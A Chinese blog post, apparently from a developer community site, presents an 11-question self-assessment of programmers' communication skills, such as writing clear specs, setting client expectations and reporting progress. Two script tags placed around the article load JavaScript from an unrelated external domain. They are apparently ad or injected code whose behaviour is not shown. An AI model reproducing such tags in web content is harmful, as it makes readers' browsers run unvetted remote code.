程序员的沟通能力测试

<script language='javascript' src='http://www.taizhou.la/AD/ad.js'></script>

最近一两年里高端技术人员严重短缺。经常有作猎头的朋友,让我帮忙看看有什么推荐人选。看看他们发过来的JD,一般除了要求精通技术外,还得擅长沟通(中英文)。看完之后往往无奈,这样的人一是很少;二是如果有,在国内的体制下通常都是很快就进入管理层了,哪里还愿意再从头做起。

沟通能力对于职业人非常重要,对程序员也不例外,毕竟现在的软件开发更多的牵涉到合作而非个人英雄主义。当然,由于职业的特点,即使同样是沟通,程序员与其他职业如销售、市场,在具体场景上有很大的不同。也不能完全套用衡量其他职位的标准,来判断程序员的沟通能力。

一时兴起,设计了一个关于程序员的沟通能力的简单测试,每道题目根据你觉得自己的符合程度打分,从1-5。1表示完全不符合,5表示非常符合。然后把总分除以题目数(11),看看可以得5分制中的几分。

1. 你负责进行软件功能设计。根据你写出的软件功能规格说明书,业务、开发、测试等各方面的人员能够基本清楚的了解软件的功能,并且以此为基础,进行自身的工作(并不是说你可以写出一份一步到位完美的咚咚)。而不需要一遍又一遍的拷问你,并且从你的嘴里得出n个不同版本的答案。

2. 你的同事察看你的源代码,能够弄清楚大致逻辑,而不是如同看天书。

3. 你们软件出现了一个 Bug,你的客户希望1 天内解决,而你估计需要两周到一个月的时间进行修复。你能够在维持双方良好关系的前提下,设置客户的期望。

4. 你的同事负责技术架构的设计。你觉得其中有一个不合理的地方,但是他技术上很牛,同时也习惯于坚持自己立场不欢迎批评。你能够说服他改变设计。

5. 快过年了,你希望增加 30%的薪水。你能够就此与老板进行气氛融洽的协商。并且不论结果如何,不会影响你与老板之间的关系。

6. 你在运行应用程序时遇到了一个错误,要到网上论坛需求帮助。你写的帖子能够让别人清楚的知道问题的背景、现象、复现步骤、系统环境等等相关因素,并有一个明确的标题,而不是如“冰天雪地360度裸身跪求”之类不知所云。

7. 你能够在三分钟之内,向一位不懂技术的潜在客户介绍你们的产品,并让他对你们的产品产生兴趣。

8. 在软件开发过程中,你的上级基本掌握你当前的进度;而不是直到他认为你能够如期交付代码的前四天,你才告诉他由于这样那样的问题,你还需要一个月的时间赶上进度。

9. 在召开项目会议时,你可以做出一个条理清楚的会议记录,让大家对于当前的进度,存在的主要风险,下一步的行动计划,一目了然。

10. 客户突然提出需要增加一个特性( feature)。你能够了解他需要这个特性的动机,重要程度,以及能够接受的代价等等因素。

11. 面试的时候,你可以控制整个会谈的节奏,能把谈话引向你擅长的方向。

<script language='javascript' src='http://www.taizhou.la/AD/as.js'></script>
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值